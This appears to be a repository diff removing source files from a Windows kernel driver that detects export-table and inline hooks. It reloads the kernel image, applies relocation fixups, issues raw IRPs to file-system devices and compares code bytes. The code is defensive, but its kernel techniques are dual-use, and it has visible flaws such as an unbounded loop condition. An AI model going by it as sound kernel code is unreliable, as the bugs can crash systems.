IrpSp->DeviceObject = DeviceObject;
IrpSp->FileObject = FileObject;
IrpSp->Parameters.Read.Length = Length;
IrpSp->Parameters.Read.ByteOffset = *ByteOffset;
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
ntStatus = IoCallDriver(DeviceObject, Irp);
if (ntStatus == STATUS_PENDING)
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
return IoStatusBlock->Status;
}

42
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/FileSystem.h
View File

@ -1,42 +0,0 @@
#include "Reload.h"
NTSTATUS
IrpCreateFile(
IN PUNICODE_STRING FilePath,
IN ACCESS_MASK DesiredAccess,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PDEVICE_OBJECT DeviceObject,
IN PDEVICE_OBJECT RealDevice,
OUT PFILE_OBJECT *FileObject
);
NTSTATUS
IoCompletionRoutine(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context);
NTSTATUS
IrpQueryInformationFile(
IN PFILE_OBJECT FileObject,
IN PDEVICE_OBJECT DeviceObject,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
//Irp请求将文件读入缓冲区中
NTSTATUS
IrpReadFile(
IN PFILE_OBJECT FileObject,
IN PDEVICE_OBJECT DeviceObject,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL);

461
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/FixRelocation.c
View File

@ -1,461 +0,0 @@
#include "FixRelocation.h"
/*
*/
BOOLEAN
FixBaseRelocTable (
PVOID NewImageBase,
DWORD ExistImageBase
)
{
LONGLONG Diff;
ULONG TotalCountBytes = 0;
ULONG_PTR VA;
ULONGLONG OriginalImageBase;
ULONG SizeOfBlock;
PUCHAR FixupVA;
USHORT Offset;
PUSHORT NextOffset = NULL;
PIMAGE_NT_HEADERS NtHeaders;
PIMAGE_BASE_RELOCATION NextBlock;
NtHeaders = RtlImageNtHeader( NewImageBase );
if (NtHeaders == NULL)
{
return FALSE;
}
switch (NtHeaders->OptionalHeader.Magic) {
case IMAGE_NT_OPTIONAL_HDR32_MAGIC:
OriginalImageBase =
((PIMAGE_NT_HEADERS32)NtHeaders)->OptionalHeader.ImageBase;
break;
case IMAGE_NT_OPTIONAL_HDR64_MAGIC:
OriginalImageBase =
((PIMAGE_NT_HEADERS64)NtHeaders)->OptionalHeader.ImageBase;
break;
default:
return FALSE;
}
//
// Locate the relocation section.
//
NextBlock = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(
NewImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &TotalCountBytes);
//
// It is possible for a file to have no relocations, but the relocations
// must not have been stripped.
//
if (!NextBlock || !TotalCountBytes)
{
if (NtHeaders->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED)
{
DbgPrint("Image can't be relocated, no fixup information.\n");
return FALSE;
}
else
{
return TRUE;
}
}
//
// If the image has a relocation table, then apply the specified fixup
// information to the image.
//
Diff = (ULONG_PTR)ExistImageBase - OriginalImageBase;
while (TotalCountBytes)
{
SizeOfBlock = NextBlock->SizeOfBlock;
TotalCountBytes -= SizeOfBlock;
SizeOfBlock -= sizeof(IMAGE_BASE_RELOCATION);
SizeOfBlock /= sizeof(USHORT);
NextOffset = (PUSHORT)((PCHAR)NextBlock + sizeof(IMAGE_BASE_RELOCATION));
VA = (ULONG_PTR)NewImageBase + NextBlock->VirtualAddress;
if ( !(NextBlock = LdrProcessRelocationBlockLongLong( VA,
SizeOfBlock,
NextOffset,
Diff)) )
{
DbgPrint("%s: Unknown base relocation type\n");
return FALSE;
}
}
return TRUE;
}
/*修复重定位表*/
PIMAGE_BASE_RELOCATION
LdrProcessRelocationBlockLongLong(
IN ULONG_PTR VA,
IN ULONG SizeOfBlock,
IN PUSHORT NextOffset,
IN LONGLONG Diff
)
{
PUCHAR FixupVA;
USHORT Offset;
LONG Temp;
ULONG Temp32;
ULONGLONG Value64;
LONGLONG Temp64;
while (SizeOfBlock--) {
Offset = *NextOffset & (USHORT)0xfff;
FixupVA = (PUCHAR)(VA + Offset);
//
// Apply the fixups.
//
switch ((*NextOffset) >> 12) {
case IMAGE_REL_BASED_HIGHLOW :
//
// HighLow - (32-bits) relocate the high and low half
// of an address.
//
*(LONG UNALIGNED *)FixupVA += (ULONG) Diff;
break;
case IMAGE_REL_BASED_HIGH :
//
// High - (16-bits) relocate the high half of an address.
//
Temp = *(PUSHORT)FixupVA << 16;
Temp += (ULONG) Diff;
*(PUSHORT)FixupVA = (USHORT)(Temp >> 16);
break;
case IMAGE_REL_BASED_HIGHADJ :
//
// Adjust high - (16-bits) relocate the high half of an
// address and adjust for sign extension of low half.
//
//
// If the address has already been relocated then don't
// process it again now or information will be lost.
//
if (Offset & LDRP_RELOCATION_FINAL) {
++NextOffset;
--SizeOfBlock;
break;
}
Temp = *(PUSHORT)FixupVA << 16;
++NextOffset;
--SizeOfBlock;
Temp += (LONG)(*(PSHORT)NextOffset);
Temp += (ULONG) Diff;
Temp += 0x8000;
*(PUSHORT)FixupVA = (USHORT)(Temp >> 16);
break;
case IMAGE_REL_BASED_LOW :
//
// Low - (16-bit) relocate the low half of an address.
//
Temp = *(PSHORT)FixupVA;
Temp += (ULONG) Diff;
*(PUSHORT)FixupVA = (USHORT)Temp;
break;
case IMAGE_REL_BASED_IA64_IMM64:
//
// Align it to bundle address before fixing up the
// 64-bit immediate value of the movl instruction.
//
FixupVA = (PUCHAR)((ULONG_PTR)FixupVA & ~(15));
Value64 = (ULONGLONG)0;
//
// Extract the lower 32 bits of IMM64 from bundle
//
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IMM7B_INST_WORD_X,
EMARCH_ENC_I17_IMM7B_SIZE_X,
EMARCH_ENC_I17_IMM7B_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM7B_VAL_POS_X);
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IMM9D_INST_WORD_X,
EMARCH_ENC_I17_IMM9D_SIZE_X,
EMARCH_ENC_I17_IMM9D_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM9D_VAL_POS_X);
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IMM5C_INST_WORD_X,
EMARCH_ENC_I17_IMM5C_SIZE_X,
EMARCH_ENC_I17_IMM5C_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM5C_VAL_POS_X);
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IC_INST_WORD_X,
EMARCH_ENC_I17_IC_SIZE_X,
EMARCH_ENC_I17_IC_INST_WORD_POS_X,
EMARCH_ENC_I17_IC_VAL_POS_X);
EXT_IMM64(Value64,
(PULONG)FixupVA + EMARCH_ENC_I17_IMM41a_INST_WORD_X,
EMARCH_ENC_I17_IMM41a_SIZE_X,
EMARCH_ENC_I17_IMM41a_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41a_VAL_POS_X);
EXT_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41b_INST_WORD_X),
EMARCH_ENC_I17_IMM41b_SIZE_X,
EMARCH_ENC_I17_IMM41b_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41b_VAL_POS_X);
EXT_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41c_INST_WORD_X),
EMARCH_ENC_I17_IMM41c_SIZE_X,
EMARCH_ENC_I17_IMM41c_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41c_VAL_POS_X);
EXT_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_SIGN_INST_WORD_X),
EMARCH_ENC_I17_SIGN_SIZE_X,
EMARCH_ENC_I17_SIGN_INST_WORD_POS_X,
EMARCH_ENC_I17_SIGN_VAL_POS_X);
//
// Update 64-bit address
//
Value64+=Diff;
//
// Insert IMM64 into bundle
//
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM7B_INST_WORD_X),
EMARCH_ENC_I17_IMM7B_SIZE_X,
EMARCH_ENC_I17_IMM7B_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM7B_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM9D_INST_WORD_X),
EMARCH_ENC_I17_IMM9D_SIZE_X,
EMARCH_ENC_I17_IMM9D_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM9D_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM5C_INST_WORD_X),
EMARCH_ENC_I17_IMM5C_SIZE_X,
EMARCH_ENC_I17_IMM5C_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM5C_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IC_INST_WORD_X),
EMARCH_ENC_I17_IC_SIZE_X,
EMARCH_ENC_I17_IC_INST_WORD_POS_X,
EMARCH_ENC_I17_IC_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41a_INST_WORD_X),
EMARCH_ENC_I17_IMM41a_SIZE_X,
EMARCH_ENC_I17_IMM41a_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41a_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41b_INST_WORD_X),
EMARCH_ENC_I17_IMM41b_SIZE_X,
EMARCH_ENC_I17_IMM41b_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41b_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_IMM41c_INST_WORD_X),
EMARCH_ENC_I17_IMM41c_SIZE_X,
EMARCH_ENC_I17_IMM41c_INST_WORD_POS_X,
EMARCH_ENC_I17_IMM41c_VAL_POS_X);
INS_IMM64(Value64,
((PULONG)FixupVA + EMARCH_ENC_I17_SIGN_INST_WORD_X),
EMARCH_ENC_I17_SIGN_SIZE_X,
EMARCH_ENC_I17_SIGN_INST_WORD_POS_X,
EMARCH_ENC_I17_SIGN_VAL_POS_X);
break;
case IMAGE_REL_BASED_DIR64:
*(ULONGLONG UNALIGNED *)FixupVA += Diff;
break;
case IMAGE_REL_BASED_MIPS_JMPADDR :
//
// JumpAddress - (32-bits) relocate a MIPS jump address.
//
Temp = (*(PULONG)FixupVA & 0x3ffffff) << 2;
Temp += (ULONG) Diff;
*(PULONG)FixupVA = (*(PULONG)FixupVA & ~0x3ffffff) |
((Temp >> 2) & 0x3ffffff);
break;
case IMAGE_REL_BASED_ABSOLUTE :
//
// Absolute - no fixup required.
//
break;
case IMAGE_REL_BASED_SECTION :
//
// Section Relative reloc. Ignore for now.
//
break;
case IMAGE_REL_BASED_REL32 :
//
// Relative intrasection. Ignore for now.
//
break;
default :
//
// Illegal - illegal relocation type.
//
return (PIMAGE_BASE_RELOCATION)NULL;
}
++NextOffset;
}
return (PIMAGE_BASE_RELOCATION)NextOffset;
}
/*
NtHeader
*/
NTSTATUS
NTAPI
RtlImageNtHeaderEx(
ULONG Flags,
PVOID Base,
ULONG64 Size,
OUT PIMAGE_NT_HEADERS * OutHeaders
)
{
PIMAGE_NT_HEADERS NtHeaders = 0;
ULONG e_lfanew = 0;
BOOLEAN RangeCheck = 0;
NTSTATUS Status = 0;
const ULONG ValidFlags =
RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK;
if (OutHeaders != NULL) {
*OutHeaders = NULL;
}
if (OutHeaders == NULL) {
Status = STATUS_INVALID_PARAMETER;
goto Exit;
}
if ((Flags & ~ValidFlags) != 0) {
Status = STATUS_INVALID_PARAMETER;
goto Exit;
}
if (Base == NULL || Base == (PVOID)(LONG_PTR)-1) {
Status = STATUS_INVALID_PARAMETER;
goto Exit;
}
RangeCheck = ((Flags & RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK) == 0);
if (RangeCheck) {
if (Size < sizeof(IMAGE_DOS_HEADER)) {
Status = STATUS_INVALID_IMAGE_FORMAT;
goto Exit;
}
}
//
// Exception handling is not available in the boot loader, and exceptions
// were not historically caught here in kernel mode. Drivers are considered
// trusted, so we can't get an exception here due to a bad file, but we
// could take an inpage error.
//
#define EXIT goto Exit
if (((PIMAGE_DOS_HEADER)Base)->e_magic != IMAGE_DOS_SIGNATURE) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
e_lfanew = ((PIMAGE_DOS_HEADER)Base)->e_lfanew;
if (RangeCheck) {
if (e_lfanew >= Size
#define SIZEOF_PE_SIGNATURE 4
|| e_lfanew >= (MAXULONG - SIZEOF_PE_SIGNATURE - sizeof(IMAGE_FILE_HEADER))
|| (e_lfanew + SIZEOF_PE_SIGNATURE + sizeof(IMAGE_FILE_HEADER)) >= Size
) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
}
NtHeaders = (PIMAGE_NT_HEADERS)((PCHAR)Base + e_lfanew);
//
// In kernelmode, do not cross from usermode address to kernelmode address.
//
if (Base < MM_HIGHEST_USER_ADDRESS) {
if ((PVOID)NtHeaders >= MM_HIGHEST_USER_ADDRESS) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
//
// Note that this check is slightly overeager since IMAGE_NT_HEADERS has
// a builtin array of data_directories that may be larger than the image
// actually has. A better check would be to add FileHeader.SizeOfOptionalHeader,
// after ensuring that the FileHeader does not cross the u/k boundary.
//
if ((PVOID)((PCHAR)NtHeaders + sizeof (IMAGE_NT_HEADERS)) >= MM_HIGHEST_USER_ADDRESS) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
}
if (NtHeaders->Signature != IMAGE_NT_SIGNATURE) {
Status = STATUS_INVALID_IMAGE_FORMAT;
EXIT;
}
Status = STATUS_SUCCESS;
Exit:
if (NT_SUCCESS(Status)) {
*OutHeaders = NtHeaders;
}
return Status;
}
//
// PIMAGE_NT_HEADERS
// NTAPI
// RtlImageNtHeader(
// PVOID Base
// )
// {
// PIMAGE_NT_HEADERS NtHeaders = NULL;
// (VOID)RtlImageNtHeaderEx(RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK, Base, 0, &NtHeaders);
// return NtHeaders;
// }
//
//

33
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/FixRelocation.h
View File

@ -1,33 +0,0 @@
#include "Reload.h"
BOOLEAN
FixBaseRelocTable (
PVOID NewImageBase,
DWORD ExistImageBase
);
PIMAGE_BASE_RELOCATION
LdrProcessRelocationBlockLongLong(
IN ULONG_PTR VA,
IN ULONG SizeOfBlock,
IN PUSHORT NextOffset,
IN LONGLONG Diff
);
NTSTATUS
NTAPI
RtlImageNtHeaderEx(
ULONG Flags,
PVOID Base,
ULONG64 Size,
OUT PIMAGE_NT_HEADERS * OutHeaders
);
PIMAGE_NT_HEADERS
NTAPI
RtlImageNtHeader(
PVOID Base
);

694
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/KernelHookCheck.c
View File

@ -1,694 +0,0 @@
#include "KernelHookCheck.h"
#include "libdasm.h"
#include "Common.h"
#include "Reload.h"
ULONG IntHookCount; //记录Hook数量
extern DWORD OriginalKiServiceTable;
extern PSERVICE_DESCRIPTOR_TABLE OriginalServiceDescriptorTable;
extern ULONG_PTR SystemKernelModuleBase;
extern ULONG_PTR SystemKernelModuleSize;
extern ULONG_PTR ImageModuleBase;
BOOLEAN KernelHookCheck(PINLINEHOOKINFO InlineHookInfo)
{
NTSTATUS Status = STATUS_UNSUCCESSFUL;
PIMAGE_NT_HEADERS NtHeader;
PIMAGE_EXPORT_DIRECTORY ExportTable;
ULONG* FunctionAddresses;
ULONG* FunctionNames;
USHORT* FunctionIndexs;
ULONG ulIndex;
ULONG i;
CHAR* szFunctionName;
SIZE_T ViewSize=0;
ULONG_PTR ulFunctionAddress;
BOOL bIsZwFunction = FALSE;
ULONG ulOldAddress;
ULONG ulReloadAddress;
PUCHAR ulTemp;
__try{
NtHeader = RtlImageNtHeader((PVOID)ImageModuleBase);
if (NtHeader && NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress){
ExportTable =(IMAGE_EXPORT_DIRECTORY*)((ULONG_PTR)ImageModuleBase + NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
FunctionAddresses = (ULONG*)((ULONG_PTR)ImageModuleBase + ExportTable->AddressOfFunctions);
FunctionNames = (ULONG*)((ULONG_PTR)ImageModuleBase + ExportTable->AddressOfNames);
FunctionIndexs = (USHORT*)((ULONG_PTR)ImageModuleBase + ExportTable->AddressOfNameOrdinals);
for(i = 0; i < ExportTable->NumberOfNames; i++)
{
szFunctionName = (LPSTR)((ULONG_PTR)ImageModuleBase + FunctionNames[i]);
ulIndex = FunctionIndexs[i];
ulFunctionAddress = (ULONG_PTR)((ULONG_PTR)ImageModuleBase + FunctionAddresses[ulIndex]);
// ulIndex=*(ULONG*)(ulFunctionAddress+1); //32 bit 1 64 bit 4 //服务号
//对于非Zw系列函数 偏移到系统的该函数地址处
ulReloadAddress = ulFunctionAddress;
ulOldAddress = ulReloadAddress - (ULONG)ImageModuleBase + SystemKernelModuleBase;
if (!ulOldAddress ||
!MmIsAddressValid((PVOID)ulOldAddress) ||
!ulReloadAddress ||
!MmIsAddressValid((PVOID)ulReloadAddress))
{
continue;
}
bIsZwFunction = FALSE;
//检查下一层第一个call的函数的hook
if (*szFunctionName == 'Z' &&
*(szFunctionName+1) == 'w')
{
bIsZwFunction = TRUE;
ulIndex = *((WORD*)(ulFunctionAddress + 1)); //得到服务号
if (ulIndex > 0 &&
ulIndex <= OriginalServiceDescriptorTable->TableSize)
{
//对于Zw系列函数 获得系统Ntos中 对应的Nt函数的地址
ulReloadAddress = OriginalServiceDescriptorTable->ServiceTable[ulIndex];
ulOldAddress = ulReloadAddress - (ULONG)ImageModuleBase + SystemKernelModuleBase;
}
}
if (bIsZwFunction)
{
//如果 bIsZwFunction == TRUE 重新效验一下地址的有效性
if (!ulOldAddress ||
!MmIsAddressValid((PVOID)ulOldAddress) ||
!ulReloadAddress ||
!MmIsAddressValid((PVOID)ulReloadAddress))
{
continue;
}
}
else //下一层函数只扫描非Zw开头的并且只扫描未导出函数
{
GetNextFunctionAddress(ImageModuleBase,ulOldAddress,szFunctionName,InlineHookInfo);
}
ulTemp = NULL;
//对于Zw中的Nt函数 、 导出函数
//判断是否Ntos 导出表Hook
//ulOldAddress 是根据重载地址 - Base + KernelBase 真正函数的地址
ulTemp = (PUCHAR)GetEatHook(ulOldAddress,i,SystemKernelModuleBase,SystemKernelModuleSize); //比较EAT Hook
if(ulTemp)
{//导出表Hook了
FillInlineHookInfo(ulTemp,InlineHookInfo,szFunctionName,ulOldAddress,1); //EAT Hook 1
}
//是否是InlineHook
CheckFuncByOpcode((PVOID)ulReloadAddress,InlineHookInfo,szFunctionName,(PVOID)ulOldAddress);
}
}
}__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return STATUS_SUCCESS;
}
VOID FillInlineHookInfo(PUCHAR ulTemp,PINLINEHOOKINFO InlineHookInfo,CHAR* szFunctionName,ULONG ulOldAddress,ULONG HookType)
{
ULONG ulHookModuleBase;
ULONG ulHookModuleSize;
char lpszHookModuleImage[256];
ULONG IntHookCount = InlineHookInfo->ulCount;
memset(lpszHookModuleImage,0,sizeof(lpszHookModuleImage));
if (!IsAddressInSystem(
(ULONG)ulTemp,
&ulHookModuleBase,
&ulHookModuleSize,
lpszHookModuleImage))
{
memset(lpszHookModuleImage,0,sizeof(lpszHookModuleImage));
strcat(lpszHookModuleImage,"Unknown4");
ulHookModuleBase = 0;
ulHookModuleSize = 0;
}
InlineHookInfo->InlineHook[IntHookCount].ulMemoryHookBase = (ULONG)ulTemp;
memset(InlineHookInfo->InlineHook[IntHookCount].lpszFunction,0,sizeof(InlineHookInfo->InlineHook[IntHookCount].lpszFunction));
memset(InlineHookInfo->InlineHook[IntHookCount].lpszHookModuleImage,0,sizeof(InlineHookInfo->InlineHook[IntHookCount].lpszHookModuleImage));
memcpy(InlineHookInfo->InlineHook[IntHookCount].lpszFunction,szFunctionName,strlen(szFunctionName));
memcpy(InlineHookInfo->InlineHook[IntHookCount].lpszHookModuleImage,lpszHookModuleImage,strlen(lpszHookModuleImage));
InlineHookInfo->InlineHook[IntHookCount].ulMemoryFunctionBase = (ULONG)ulOldAddress;
InlineHookInfo->InlineHook[IntHookCount].ulHookModuleBase = ulHookModuleBase;
InlineHookInfo->InlineHook[IntHookCount].ulHookModuleSize = ulHookModuleSize;
InlineHookInfo->InlineHook[IntHookCount].ulHookType = HookType; //eat hook 1 Inline Hook 0
IntHookCount++;
InlineHookInfo->ulCount++;
}
VOID CheckFuncByOpcode(PVOID ulReloadAddress,PINLINEHOOKINFO InlineHookInfo,CHAR* szFunctionName,PVOID ulOldAddress)
{
INSTRUCTION Inst;
INSTRUCTION Instb;
ULONG ulHookFunctionAddress;
size_t ulCodeSize;
PUCHAR p;
PUCHAR ulTemp;
int Flagss;
if (GetFunctionCodeSize(ulOldAddress) == GetFunctionCodeSize(ulReloadAddress) &&
memcmp(ulReloadAddress,ulOldAddress,GetFunctionCodeSize(ulOldAddress)) != 0)
{//被Hook了
//开始扫描hooksss
ulCodeSize = GetFunctionCodeSize(ulOldAddress);
for (p = (PUCHAR)ulOldAddress ;(ULONG)p < (ULONG)ulOldAddress+ulCodeSize; p++)
{
//折半扫描,如果前面一半一样,则开始扫描下一半
if (memcmp(ulReloadAddress,ulOldAddress,ulCodeSize/2) == 0)
{
ulCodeSize = ulCodeSize + ulCodeSize/2;
continue;
}
if (*p == 0xcc ||
*p == 0xc2)
{
break;
}
ulHookFunctionAddress = (*(PULONG)(p + 1) + (ULONG)p + 5); //得到hook的地址
if (!MmIsAddressValid((PVOID)ulHookFunctionAddress))
{
continue;
}
ulTemp = NULL;
get_instruction(&Inst,p,MODE_32);
switch (Inst.type)
{
case INSTRUCTION_TYPE_JMP:
if(Inst.opcode==0xFF&&Inst.modrm==0x25)
{
//DIRECT_JMP
ulTemp = (PUCHAR)Inst.op1.displacement;
}
else if (Inst.opcode==0xEB)
{
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
else if(Inst.opcode==0xE9)
{
//RELATIVE_JMP;
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
break;
case INSTRUCTION_TYPE_CALL:
if(Inst.opcode==0xFF&&Inst.modrm==0x15)
{
//DIRECT_CALL
ulTemp = (PUCHAR)Inst.op1.displacement;
}
else if (Inst.opcode==0x9A)
{
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
else if(Inst.opcode==0xE8)
{
//RELATIVE_CALL;
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
break;
case INSTRUCTION_TYPE_PUSH:
if(!RMmIsAddressValid((PVOID)(p)))
{
break;
}
get_instruction(&Instb,(BYTE*)(p),MODE_32);
if(Instb.type == INSTRUCTION_TYPE_RET)
{
//StartAddress+len-inst.length-instb.length;
ulTemp = (PUCHAR)Instb.op1.displacement;
}
break;
}
if (ulTemp &&
RMmIsAddressValid(ulTemp) &&
RMmIsAddressValid(p)) //hook的地址也要有效才可以哦
{
if ((ULONG)ulTemp > SystemKernelModuleBase &&
(ULONG)ulTemp < SystemKernelModuleBase+SystemKernelModuleSize) //太近的跳也不是
{
goto Next;
}
//ulTemp也不能小于 SystemKernelModuleBase
if ((ULONG)ulTemp < SystemKernelModuleBase)
{
goto Next;
}
//KdPrint(("%08x-%08x-%08x",p,ulTemp,(SystemKernelModuleBase + SystemKernelModuleSize + 0xfffffff)));
if (*(ULONG *)ulTemp == 0x00000000 ||
*(ULONG *)ulTemp == 0x00000005 ||
*(ULONG *)ulTemp == 0xc0000012)
{
goto Next;
}
Flagss = 0;
__asm{
mov esi,ulTemp
mov ax,word ptr [esi]
cmp ax,0x0000
jz Cont//是add byte ptr [eax],al
//结束
mov Flagss,1
Cont:
}
if (Flagss != 1)
goto Next;
ulTemp = ulTemp+0x5;
//简单处理一下二级跳
if (*ulTemp == 0xe9 ||
*ulTemp == 0xe8)
{
ulTemp = (PUCHAR)(*(PULONG)(ulTemp+1)+(ULONG)(ulTemp+5));
}
FillInlineHookInfo(ulTemp,InlineHookInfo,szFunctionName,(ULONG)p,0); //Inline Hook
Next:
_asm{nop}
}
}
}
}
//获取导出函数下一级0xe8 call函数的inlinehookcheck
ULONG GetNextFunctionAddress(ULONG ulNtDllModuleBase,ULONG ulOldAddress,char *functionName,PINLINEHOOKINFO InlineHookInfo)
{
ULONG ulCodeSize;
ULONG ulNextFunCodeSize;
ULONG ulNextFunReloadCodeSize;
PUCHAR i;
PUCHAR ulNextFunctionAddress = NULL;
PUCHAR ulReloadNextFunctionAddress = NULL;
BOOL bRetOK = FALSE;
PUCHAR ulTemp;
ULONG ulHookFunctionAddress;
PUCHAR p;
INSTRUCTION Inst;
INSTRUCTION Instb;
char lpszHookModuleImage[256];
ULONG ulHookModuleBase;
ULONG ulHookModuleSize;
int Flagss;
if (!MmIsAddressValid((PVOID)ulOldAddress))
{
return bRetOK;
}
__try
{
ulCodeSize = GetFunctionCodeSize((PVOID)ulOldAddress);
for (i=(PUCHAR)ulOldAddress;i < i+ulCodeSize;i++)
{
//扫描二次跳转
if (*i == 0xe8)
{
ulNextFunctionAddress = (PUCHAR)(*(PULONG)(i+1)+(ULONG)(i+5));
if (MmIsAddressValid((PVOID)ulNextFunctionAddress))
{
//判断一下是否是导出函数
if (IsFunctionInExportTable(ulNtDllModuleBase,(ULONG)ulNextFunctionAddress))
{
return 0;
}
//做hook 扫描
ulReloadNextFunctionAddress = ulNextFunctionAddress - SystemKernelModuleBase + ImageModuleBase;
if (MmIsAddressValid(ulReloadNextFunctionAddress) &&
MmIsAddressValid(ulNextFunctionAddress))
{
ulNextFunCodeSize = GetFunctionCodeSize(ulNextFunctionAddress);
ulNextFunReloadCodeSize = GetFunctionCodeSize(ulReloadNextFunctionAddress);
if (ulNextFunCodeSize == ulNextFunReloadCodeSize &&
memcmp(ulReloadNextFunctionAddress,ulNextFunctionAddress,ulNextFunCodeSize) != 0)
{
//被hook了
for (p = (PUCHAR)ulNextFunctionAddress ;(ULONG)p < (ULONG)ulNextFunctionAddress+ulNextFunCodeSize; p++)
{
//折半扫描,如果前面一半一样,则开始扫描下一半
if (memcmp(ulReloadNextFunctionAddress, ulNextFunctionAddress,ulNextFunCodeSize/2) == 0)
{
ulNextFunCodeSize = ulNextFunCodeSize + ulNextFunCodeSize/2;
continue;
}
//是否结束?
if (*p == 0xcc ||
*p == 0xc2)
{
break;
}
ulHookFunctionAddress = (*(PULONG)(p + 1) + (ULONG)p + 5); //得到地址
if (!RMmIsAddressValid((PVOID)ulHookFunctionAddress))
{
continue;
}
ulTemp = NULL;
get_instruction(&Inst,p,MODE_32);
switch (Inst.type)
{
case INSTRUCTION_TYPE_JMP:
if(Inst.opcode==0xFF&&Inst.modrm==0x25)
{
//DIRECT_JMP
ulTemp = (PUCHAR)Inst.op1.displacement;
}
else if (Inst.opcode==0xEB)
{
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
else if(Inst.opcode==0xE9)
{
//RELATIVE_JMP;
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
break;
case INSTRUCTION_TYPE_CALL:
if(Inst.opcode==0xFF&&Inst.modrm==0x15)
{
//DIRECT_CALL
ulTemp = (PUCHAR)Inst.op1.displacement;
}
else if (Inst.opcode==0x9A)
{
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
else if(Inst.opcode==0xE8)
{
//RELATIVE_CALL;
ulTemp = (PUCHAR)(p+Inst.op1.immediate);
}
break;
case INSTRUCTION_TYPE_PUSH:
if(!RMmIsAddressValid((PVOID)(p)))
{
break;
}
get_instruction(&Instb,(BYTE*)(p),MODE_32);
if(Instb.type == INSTRUCTION_TYPE_RET)
{
//StartAddress+len-inst.length-instb.length;
ulTemp = (PUCHAR)Instb.op1.displacement;
}
break;
}
if (ulTemp &&
MmIsAddressValid(ulTemp) &&
MmIsAddressValid(p)) //hook的地址也要有效才可以哦
{
if ((ULONG)ulTemp > SystemKernelModuleBase &&
(ULONG)ulTemp < SystemKernelModuleBase+SystemKernelModuleSize) //太近的跳也不是
{
goto Next;
}
//ulTemp也不能小于 SystemKernelModuleBase
if ((ULONG)ulTemp < SystemKernelModuleBase)
{
goto Next;
}
if (*(ULONG *)ulTemp == 0x00000000 ||
*(ULONG *)ulTemp == 0x00000005)
{
goto Next;
}
Flagss = 0;
__asm{
mov esi,ulTemp
mov ax,word ptr [esi]
cmp ax,0x0000
jz Cont//是add byte ptr [eax],al
mov Flagss,1
Cont:
}
if (Flagss != 1)
goto Next;
ulTemp = ulTemp+0x5;
//简单处理一下二级跳
if (*ulTemp == 0xe9 ||
*ulTemp == 0xe8)
{
ulTemp = (PUCHAR)(*(PULONG)(ulTemp+1)+(ULONG)(ulTemp+5));
}
FillInlineHookInfo(ulTemp+0x5,InlineHookInfo,functionName,(ULONG)p,2);
Next:
_asm{nop}
}
}
}
}
}
}
//结束鸟
if (*i == 0xcc ||
*i == 0xc2)
{
return 0;
}
}
}__except(EXCEPTION_EXECUTE_HANDLER){
}
return 0;
}
